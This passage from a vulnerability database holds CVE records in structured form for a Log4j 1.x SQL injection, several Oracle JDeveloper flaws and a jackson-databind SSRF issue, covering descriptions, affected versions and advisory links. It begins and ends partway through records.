Users should upgrade to Log4j 2 as it addresses numerous other issues from the previous versions.", }, ], }, generator: { engine: "Vulnogram 0.0.9", }, impact: [ { other: "high", }, ], problemtype: { problemtype_data: [ { description: [ { lang: "eng", value: "CWE-89 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')", }, ], }, ], }, references: { reference_data: [ { name: "https://logging.apache.org/log4j/1.2/index.html", refsource: "MISC", url: "https://logging.apache.org/log4j/1.2/index.html", }, { name: "https://lists.apache.org/thread/pt6lh3pbsvxqlwlp4c5l798dv2hkc85y", refsource: "MISC", url: "https://lists.apache.org/thread/pt6lh3pbsvxqlwlp4c5l798dv2hkc85y", }, { name: "[oss-security] 20220118 CVE-2022-23305: SQL injection in JDBC Appender in Apache Log4j V1", refsource: "MLIST", url: "http://www.openwall.com/lists/oss-security/2022/01/18/4", }, { name: "https://www.oracle.com/security-alerts/cpuapr2022.html", refsource: "MISC", url: "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { name: "https://security.netapp.com/advisory/ntap-20220217-0007/", refsource: "CONFIRM", url: "https://security.netapp.com/advisory/ntap-20220217-0007/", }, { name: "https://www.oracle.com/security-alerts/cpujul2022.html", refsource: "MISC", url: "https://www.oracle.com/security-alerts/cpujul2022.html", }, ], }, source: { discovery: "UNKNOWN", }, work_around: [ { lang: "en", value: "Users should upgrade to Log4j 2 or remove usage of the JDBCAppender from their configurations.", }, ], }, }, }, cveMetadata: { assignerOrgId: "f0158376-9dc2-43b6-827c-5f631a4d8d09", assignerShortName: "apache", cveId: "CVE-2022-23305", datePublished: "2022-01-18T15:25:22", dateReserved: "2022-01-17T00:00:00", dateUpdated: "2024-08-03T03:36:20.421Z", state: "PUBLISHED", }, dataType: "CVE_RECORD", dataVersion: "5.1", }
cve-2008-2623
Vulnerability from cvelistv5
| URL | Tags |
|---|---|
| http://secunia.com/advisories/33525 | third-party-advisory, x_refsource_SECUNIA |
| http://www.vupen.com/english/advisories/2009/0115 | vdb-entry, x_refsource_VUPEN |
| http://www.oracle.com/technetwork/topics/security/cpujan2009-097901.html | x_refsource_CONFIRM |
| http://www.securitytracker.com/id?1021572 | vdb-entry, x_refsource_SECTRACK |
| http://www.securityfocus.com/bid/33177 | vdb-entry, x_refsource_BID |
{ containers: { adp: [ { providerMetadata: { dateUpdated: "2024-08-07T09:05:30.403Z", orgId: "af854a3a-2127-422b-91ae-364da2661108", shortName: "CVE", }, references: [ { name: "33525", tags: [ "third-party-advisory", "x_refsource_SECUNIA", "x_transferred", ], url: "http://secunia.com/advisories/33525", }, { name: "ADV-2009-0115", tags: [ "vdb-entry", "x_refsource_VUPEN", "x_transferred", ], url: "http://www.vupen.com/english/advisories/2009/0115", }, { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "http://www.oracle.com/technetwork/topics/security/cpujan2009-097901.html", }, { name: "1021572", tags: [ "vdb-entry", "x_refsource_SECTRACK", "x_transferred", ], url: "http://www.securitytracker.com/id?1021572", }, { name: "33177", tags: [ "vdb-entry", "x_refsource_BID", "x_transferred", ], url: "http://www.securityfocus.com/bid/33177", }, ], title: "CVE Program Container", }, ], cna: { affected: [ { product: "n/a", vendor: "n/a", versions: [ { status: "affected", version: "n/a", }, ], }, ], datePublic: "2009-01-13T00:00:00", descriptions: [ { lang: "en", value: "Unspecified vulnerability in the Oracle JDeveloper component in Oracle Application Server 10.1.2.3 allows local users to affect confidentiality via unknown vectors.", }, ], problemTypes: [ { descriptions: [ { description: "n/a", lang: "en", type: "text", }, ], }, ], providerMetadata: { dateUpdated: "2009-01-24T10:00:00", orgId: "8254265b-2729-46b6-b9e3-3dfca2d5bfca", shortName: "mitre", }, references: [ { name: "33525", tags: [ "third-party-advisory", "x_refsource_SECUNIA", ], url: "http://secunia.com/advisories/33525", }, { name: "ADV-2009-0115", tags: [ "vdb-entry", "x_refsource_VUPEN", ], url: "http://www.vupen.com/english/advisories/2009/0115", }, { tags: [ "x_refsource_CONFIRM", ], url: "http://www.oracle.com/technetwork/topics/security/cpujan2009-097901.html", }, { name: "1021572", tags: [ "vdb-entry", "x_refsource_SECTRACK", ], url: "http://www.securitytracker.com/id?1021572", }, { name: 
"33177", tags: [ "vdb-entry", "x_refsource_BID", ], url: "http://www.securityfocus.com/bid/33177", }, ], x_legacyV4Record: { CVE_data_meta: { ASSIGNER: "cve@mitre.org", ID: "CVE-2008-2623", STATE: "PUBLIC", }, affects: { vendor: { vendor_data: [ { product: { product_data: [ { product_name: "n/a", version: { version_data: [ { version_value: "n/a", }, ], }, }, ], }, vendor_name: "n/a", }, ], }, }, data_format: "MITRE", data_type: "CVE", data_version: "4.0", description: { description_data: [ { lang: "eng", value: "Unspecified vulnerability in the Oracle JDeveloper component in Oracle Application Server 10.1.2.3 allows local users to affect confidentiality via unknown vectors.", }, ], }, problemtype: { problemtype_data: [ { description: [ { lang: "eng", value: "n/a", }, ], }, ], }, references: { reference_data: [ { name: "33525", refsource: "SECUNIA", url: "http://secunia.com/advisories/33525", }, { name: "ADV-2009-0115", refsource: "VUPEN", url: "http://www.vupen.com/english/advisories/2009/0115", }, { name: "http://www.oracle.com/technetwork/topics/security/cpujan2009-097901.html", refsource: "CONFIRM", url: "http://www.oracle.com/technetwork/topics/security/cpujan2009-097901.html", }, { name: "1021572", refsource: "SECTRACK", url: "http://www.securitytracker.com/id?1021572", }, { name: "33177", refsource: "BID", url: "http://www.securityfocus.com/bid/33177", }, ], }, }, }, }, cveMetadata: { assignerOrgId: "8254265b-2729-46b6-b9e3-3dfca2d5bfca", assignerShortName: "mitre", cveId: "CVE-2008-2623", datePublished: "2009-01-14T02:00:00", dateReserved: "2008-06-09T00:00:00", dateUpdated: "2024-08-07T09:05:30.403Z", state: "PUBLISHED", }, dataType: "CVE_RECORD", dataVersion: "5.1", }
cve-2018-14721
Vulnerability from cvelistv5
{ containers: { adp: [ { providerMetadata: { dateUpdated: "2024-08-05T09:38:13.150Z", orgId: "af854a3a-2127-422b-91ae-364da2661108", shortName: "CVE", }, references: [ { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", }, { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "https://github.com/FasterXML/jackson-databind/issues/2097", }, { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html", }, { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.7", }, { name: "[debian-lts-announce] 20190304 [SECURITY] [DLA 1703-1] jackson-databind security update", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.debian.org/debian-lts-announce/2019/03/msg00005.html", }, { name: "[pulsar-commits] 20190416 [GitHub] [pulsar] one70six opened a new issue #4057: Security Vulnerabilities - Black Duck Scan - Pulsar v.2.3.1", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/ff8dcfe29377088ab655fda9d585dccd5b1f07fabd94ae84fd60a7f8%40%3Ccommits.pulsar.apache.org%3E", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html", }, { name: "RHSA-2019:0782", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2019:0782", }, { name: "RHBA-2019:0959", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHBA-2019:0959", }, { name: "RHSA-2019:1107", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2019:1107", }, { name: "RHSA-2019:1108", tags: [ "vendor-advisory", "x_refsource_REDHAT", 
"x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2019:1108", }, { name: "RHSA-2019:1106", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2019:1106", }, { name: "RHSA-2019:1140", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2019:1140", }, { name: "DSA-4452", tags: [ "vendor-advisory", "x_refsource_DEBIAN", "x_transferred", ], url: "https://www.debian.org/security/2019/dsa-4452", }, { name: "20190527 [SECURITY] [DSA 4452-1] jackson-databind security update", tags: [ "mailing-list", "x_refsource_BUGTRAQ", "x_transferred", ], url: "https://seclists.org/bugtraq/2019/May/68", }, { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "https://security.netapp.com/advisory/ntap-20190530-0003/", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html", }, { name: "RHSA-2019:1822", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2019:1822", }, { name: "RHSA-2019:1823", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2019:1823", }, { name: "RHSA-2019:2858", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2019:2858", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", }, { name: "[drill-dev] 20191017 Dependencies used by Drill contain known vulnerabilities", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442%40%3Cdev.drill.apache.org%3E", }, { name: "RHSA-2019:3149", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: 
"https://access.redhat.com/errata/RHSA-2019:3149", }, { name: "[drill-dev] 20191021 [jira] [Created] (DRILL-7416) Updates required to dependencies to resolve potential security vulnerabilities", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f%40%3Cdev.drill.apache.org%3E", }, { name: "[drill-issues] 20191021 [jira] [Created] (DRILL-7416) Updates required to dependencies to resolve potential security vulnerabilities", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc%40%3Cissues.drill.apache.org%3E", }, { name: "RHSA-2019:3892", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2019:3892", }, { name: "RHSA-2019:4037", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2019:4037", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpuapr2020.html", }, { name: "[geode-issues] 20200831 [jira] [Created] (GEODE-8471) Dependency security issues in geode-core-1.12", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2%40%3Cissues.geode.apache.org%3E", }, ], title: "CVE Program Container", }, ], cna: { affected: [ { product: "n/a", vendor: "n/a", versions: [ { status: "affected", version: "n/a", }, ], }, ], datePublic: "2018-07-27T00:00:00", descriptions: [ { lang: "en", value: "FasterXML jackson-databind 2.x before 2.9.7 might allow remote attackers to conduct server-side request forgery (SSRF) attacks by leveraging failure to block the axis2-jaxws class from polymorphic deserialization.", }, ], problemTypes: [ { descriptions: [ { description: "n/a", lang: "en", 
type: "text", }, ], }, ], providerMetadata: { dateUpdated: "2020-08-31T13:06:06", orgId: "8254265b-2729-46b6-b9e3-3dfca2d5bfca", shortName: "mitre", }, references: [ { tags: [ "x_refsource_CONFIRM", ], url: "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", }, { tags: [ "x_refsource_CONFIRM", ], url: "https://github.com/FasterXML/jackson-databind/issues/2097", }, { tags: [ "x_refsource_CONFIRM", ], url: "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html", }, { tags: [ "x_refsource_CONFIRM", ], url: "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.7", }, { name: "[debian-lts-announce] 20190304 [SECURITY] [DLA 1703-1] jackson-databind security update", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.debian.org/debian-lts-announce/2019/03/msg00005.html", }, { name: "[pulsar-commits] 20190416 [GitHub] [pulsar] one70six opened a new issue #4057: Security Vulnerabilities - Black Duck Scan - Pulsar v.2.3.1", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/ff8dcfe29377088ab655fda9d585dccd5b1f07fabd94ae84fd60a7f8%40%3Ccommits.pulsar.apache.org%3E", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html", }, { name: "RHSA-2019:0782", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2019:0782", }, { name: "RHBA-2019:0959", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHBA-2019:0959", }, { name: "RHSA-2019:1107", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2019:1107", }, { name: "RHSA-2019:1108", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2019:1108", }, { name: "RHSA-2019:1106", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: 
"https://access.redhat.com/errata/RHSA-2019:1106", }, { name: "RHSA-2019:1140", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2019:1140", }, { name: "DSA-4452", tags: [ "vendor-advisory", "x_refsource_DEBIAN", ], url: "https://www.debian.org/security/2019/dsa-4452", }, { name: "20190527 [SECURITY] [DSA 4452-1] jackson-databind security update", tags: [ "mailing-list", "x_refsource_BUGTRAQ", ], url: "https://seclists.org/bugtraq/2019/May/68", }, { tags: [ "x_refsource_CONFIRM", ], url: "https://security.netapp.com/advisory/ntap-20190530-0003/", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html", }, { name: "RHSA-2019:1822", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2019:1822", }, { name: "RHSA-2019:1823", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2019:1823", }, { name: "RHSA-2019:2858", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2019:2858", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", }, { name: "[drill-dev] 20191017 Dependencies used by Drill contain known vulnerabilities", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442%40%3Cdev.drill.apache.org%3E", }, { name: "RHSA-2019:3149", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2019:3149", }, { name: "[drill-dev] 20191021 [jira] [Created] (DRILL-7416) Updates required to dependencies to resolve potential security vulnerabilities", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f%40%3Cdev.drill.apache.org%3E", }, { name: 
"[drill-issues] 20191021 [jira] [Created] (DRILL-7416) Updates required to dependencies to resolve potential security vulnerabilities", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc%40%3Cissues.drill.apache.org%3E", }, { name: "RHSA-2019:3892", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2019:3892", }, { name: "RHSA-2019:4037", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2019:4037", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/security-alerts/cpuapr2020.html", }, { name: "[geode-issues] 20200831 [jira] [Created] (GEODE-8471) Dependency security issues in geode-core-1.12", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2%40%3Cissues.geode.apache.org%3E", }, ], x_legacyV4Record: { CVE_data_meta: { ASSIGNER: "cve@mitre.org", ID: "CVE-2018-14721", STATE: "PUBLIC", }, affects: { vendor: { vendor_data: [ { product: { product_data: [ { product_name: "n/a", version: { version_data: [ { version_value: "n/a", }, ], }, }, ], }, vendor_name: "n/a", }, ], }, }, data_format: "MITRE", data_type: "CVE", data_version: "4.0", description: { description_data: [ { lang: "eng", value: "FasterXML jackson-databind 2.x before 2.9.7 might allow remote attackers to conduct server-side request forgery (SSRF) attacks by leveraging failure to block the axis2-jaxws class from polymorphic deserialization.", }, ], }, problemtype: { problemtype_data: [ { description: [ { lang: "eng", value: "n/a", }, ], }, ], }, references: { reference_data: [ { name: "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", refsource: "CONFIRM", url: "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", }, { 
name: "https://github.com/FasterXML/jackson-databind/issues/2097", refsource: "CONFIRM", url: "https://github.com/FasterXML/jackson-databind/issues/2097", }, { name: "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html", refsource: "CONFIRM", url: "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html", }, { name: "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.7", refsource: "CONFIRM", url: "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.7", }, { name: "[debian-lts-announce] 20190304 [SECURITY] [DLA 1703-1] jackson-databind security update", refsource: "MLIST", url: "https://lists.debian.org/debian-lts-announce/2019/03/msg00005.html", }, { name: "[pulsar-commits] 20190416 [GitHub] [pulsar] one70six opened a new issue #4057: Security Vulnerabilities - Black Duck Scan - Pulsar v.2.3.1", refsource: "MLIST", url: "https://lists.apache.org/thread.html/ff8dcfe29377088ab655fda9d585dccd5b1f07fabd94ae84fd60a7f8@%3Ccommits.pulsar.apache.org%3E", }, { name: "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html", refsource: "MISC", url: "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html", }, { name: "RHSA-2019:0782", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2019:0782", }, { name: "RHBA-2019:0959", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHBA-2019:0959", }, { name: "RHSA-2019:1107", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2019:1107", }, { name: "RHSA-2019:1108", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2019:1108", }, { name: "RHSA-2019:1106", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2019:1106", }, { name: "RHSA-2019:1140", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2019:1140", }, { name: "DSA-4452", refsource: "DEBIAN", url: "https://www.debian.org/security/2019/dsa-4452", }, { name: "20190527 [SECURITY] [DSA 
4452-1] jackson-databind security update", refsource: "BUGTRAQ", url: "https://seclists.org/bugtraq/2019/May/68", }, { name: "https://security.netapp.com/advisory/ntap-20190530-0003/", refsource: "CONFIRM", url: "https://security.netapp.com/advisory/ntap-20190530-0003/", }, { name: "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html", refsource: "MISC", url: "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html", }, { name: "RHSA-2019:1822", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2019:1822", }, { name: "RHSA-2019:1823", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2019:1823", }, { name: "RHSA-2019:2858", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2019:2858", }, { name: "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", refsource: "MISC", url: "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", }, { name: "[drill-dev] 20191017 Dependencies used by Drill contain known vulnerabilities", refsource: "MLIST", url: "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@%3Cdev.drill.apache.org%3E", }, { name: "RHSA-2019:3149", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2019:3149", }, { name: "[drill-dev] 20191021 [jira] [Created] (DRILL-7416) Updates required to dependencies to resolve potential security vulnerabilities", refsource: "MLIST", url: "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3Cdev.drill.apache.org%3E", }, { name: "[drill-issues] 20191021 [jira] [Created] (DRILL-7416) Updates required to dependencies to resolve potential security vulnerabilities", refsource: "MLIST", url: "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3Cissues.drill.apache.org%3E", }, { name: "RHSA-2019:3892", refsource: "REDHAT", url: 
"https://access.redhat.com/errata/RHSA-2019:3892", }, { name: "RHSA-2019:4037", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2019:4037", }, { name: "https://www.oracle.com/security-alerts/cpuapr2020.html", refsource: "MISC", url: "https://www.oracle.com/security-alerts/cpuapr2020.html", }, { name: "[geode-issues] 20200831 [jira] [Created] (GEODE-8471) Dependency security issues in geode-core-1.12", refsource: "MLIST", url: "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E", }, ], }, }, }, }, cveMetadata: { assignerOrgId: "8254265b-2729-46b6-b9e3-3dfca2d5bfca", assignerShortName: "mitre", cveId: "CVE-2018-14721", datePublished: "2019-01-02T18:00:00", dateReserved: "2018-07-28T00:00:00", dateUpdated: "2024-08-05T09:38:13.150Z", state: "PUBLISHED", }, dataType: "CVE_RECORD", dataVersion: "5.1", }
cve-2005-2291
Vulnerability from cvelistv5
| URL | Tags |
|---|---|
| http://marc.info/?l=bugtraq&m=112129082323341&w=2 | mailing-list, x_refsource_BUGTRAQ |
| http://www.red-database-security.com/advisory/oracle_jdeveloper_passes_plaintext_password.html | x_refsource_MISC |
{ containers: { adp: [ { providerMetadata: { dateUpdated: "2024-08-07T22:22:47.768Z", orgId: "af854a3a-2127-422b-91ae-364da2661108", shortName: "CVE", }, references: [ { name: "20050713 Advisory: Oracle JDeveloper passes Plaintext Password", tags: [ "mailing-list", "x_refsource_BUGTRAQ", "x_transferred", ], url: "http://marc.info/?l=bugtraq&m=112129082323341&w=2", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "http://www.red-database-security.com/advisory/oracle_jdeveloper_passes_plaintext_password.html", }, ], title: "CVE Program Container", }, ], cna: { affected: [ { product: "n/a", vendor: "n/a", versions: [ { status: "affected", version: "n/a", }, ], }, ], datePublic: "2005-07-13T00:00:00", descriptions: [ { lang: "en", value: "Oracle JDeveloper 9.0.4, 9.0.5, and 10.1.2 passes the cleartext password as a parameter when starting sqlplus, which allows local users to gain sensitive information.", }, ], problemTypes: [ { descriptions: [ { description: "n/a", lang: "en", type: "text", }, ], }, ], providerMetadata: { dateUpdated: "2016-10-17T13:57:01", orgId: "8254265b-2729-46b6-b9e3-3dfca2d5bfca", shortName: "mitre", }, references: [ { name: "20050713 Advisory: Oracle JDeveloper passes Plaintext Password", tags: [ "mailing-list", "x_refsource_BUGTRAQ", ], url: "http://marc.info/?l=bugtraq&m=112129082323341&w=2", }, { tags: [ "x_refsource_MISC", ], url: "http://www.red-database-security.com/advisory/oracle_jdeveloper_passes_plaintext_password.html", }, ], x_legacyV4Record: { CVE_data_meta: { ASSIGNER: "cve@mitre.org", ID: "CVE-2005-2291", STATE: "PUBLIC", }, affects: { vendor: { vendor_data: [ { product: { product_data: [ { product_name: "n/a", version: { version_data: [ { version_value: "n/a", }, ], }, }, ], }, vendor_name: "n/a", }, ], }, }, data_format: "MITRE", data_type: "CVE", data_version: "4.0", description: { description_data: [ { lang: "eng", value: "Oracle JDeveloper 9.0.4, 9.0.5, and 10.1.2 passes the cleartext password as a parameter when 
starting sqlplus, which allows local users to gain sensitive information.", }, ], }, problemtype: { problemtype_data: [ { description: [ { lang: "eng", value: "n/a", }, ], }, ], }, references: { reference_data: [ { name: "20050713 Advisory: Oracle JDeveloper passes Plaintext Password", refsource: "BUGTRAQ", url: "http://marc.info/?l=bugtraq&m=112129082323341&w=2", }, { name: "http://www.red-database-security.com/advisory/oracle_jdeveloper_passes_plaintext_password.html", refsource: "MISC", url: "http://www.red-database-security.com/advisory/oracle_jdeveloper_passes_plaintext_password.html", }, ], }, }, }, }, cveMetadata: { assignerOrgId: "8254265b-2729-46b6-b9e3-3dfca2d5bfca", assignerShortName: "mitre", cveId: "CVE-2005-2291", datePublished: "2005-07-17T04:00:00", dateReserved: "2005-07-17T00:00:00", dateUpdated: "2024-08-07T22:22:47.768Z", state: "PUBLISHED", }, dataType: "CVE_RECORD", dataVersion: "5.1", }
cve-2017-10273
Vulnerability from cvelistv5
| URL | Tags |
|---|---|
| http://www.securityfocus.com/bid/102569 | vdb-entry, x_refsource_BID |
| https://www.exploit-db.com/exploits/43848/ | exploit, x_refsource_EXPLOIT-DB |
| http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html | x_refsource_CONFIRM |
| http://www.securitytracker.com/id/1040207 | vdb-entry, x_refsource_SECTRACK |
| Vendor | Product | Version |
|---|---|---|
| Oracle Corporation | JDeveloper | Version: 11.1.1.7.0 Version: 11.1.1.7.1 Version: 11.1.1.9.0 Version: 11.1.2.4.0 Version: 12.1.3.0.0 Version: 12.2.1.2.0 |
{ containers: { adp: [ { providerMetadata: { dateUpdated: "2024-08-05T17:33:17.014Z", orgId: "af854a3a-2127-422b-91ae-364da2661108", shortName: "CVE", }, references: [ { name: "102569", tags: [ "vdb-entry", "x_refsource_BID", "x_transferred", ], url: "http://www.securityfocus.com/bid/102569", }, { name: "43848", tags: [ "exploit", "x_refsource_EXPLOIT-DB", "x_transferred", ], url: "https://www.exploit-db.com/exploits/43848/", }, { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html", }, { name: "1040207", tags: [ "vdb-entry", "x_refsource_SECTRACK", "x_transferred", ], url: "http://www.securitytracker.com/id/1040207", }, ], title: "CVE Program Container", }, { metrics: [ { other: { content: { id: "CVE-2017-10273", options: [ { Exploitation: "none", }, { Automatable: "no", }, { "Technical Impact": "partial", }, ], role: "CISA Coordinator", timestamp: "2024-10-04T15:41:34.170666Z", version: "2.0.3", }, type: "ssvc", }, }, ], providerMetadata: { dateUpdated: "2024-10-04T16:38:51.515Z", orgId: "134c704f-9b21-4f2e-91b3-4a467353bcc0", shortName: "CISA-ADP", }, title: "CISA ADP Vulnrichment", }, ], cna: { affected: [ { product: "JDeveloper", vendor: "Oracle Corporation", versions: [ { status: "affected", version: "11.1.1.7.0", }, { status: "affected", version: "11.1.1.7.1", }, { status: "affected", version: "11.1.1.9.0", }, { status: "affected", version: "11.1.2.4.0", }, { status: "affected", version: "12.1.3.0.0", }, { status: "affected", version: "12.2.1.2.0", }, ], }, ], datePublic: "2017-09-12T00:00:00", descriptions: [ { lang: "en", value: "Vulnerability in the Oracle JDeveloper component of Oracle Fusion Middleware (subcomponent: Deployment). Supported versions that are affected are 11.1.1.7.0, 11.1.1.7.1, 11.1.1.9.0, 11.1.2.4.0, 12.1.3.0.0 and 12.2.1.2.0. 
Difficult to exploit vulnerability allows high privileged attacker with logon to the infrastructure where Oracle JDeveloper executes to compromise Oracle JDeveloper. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle JDeveloper, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle JDeveloper accessible data as well as unauthorized read access to a subset of Oracle JDeveloper accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle JDeveloper. CVSS 3.0 Base Score 4.7 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:L/AC:H/PR:H/UI:R/S:C/C:L/I:L/A:L).", }, ], problemTypes: [ { descriptions: [ { description: "Difficult to exploit vulnerability allows high privileged attacker with logon to the infrastructure where Oracle JDeveloper executes to compromise Oracle JDeveloper. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle JDeveloper, attacks may significantly impact additional products. 
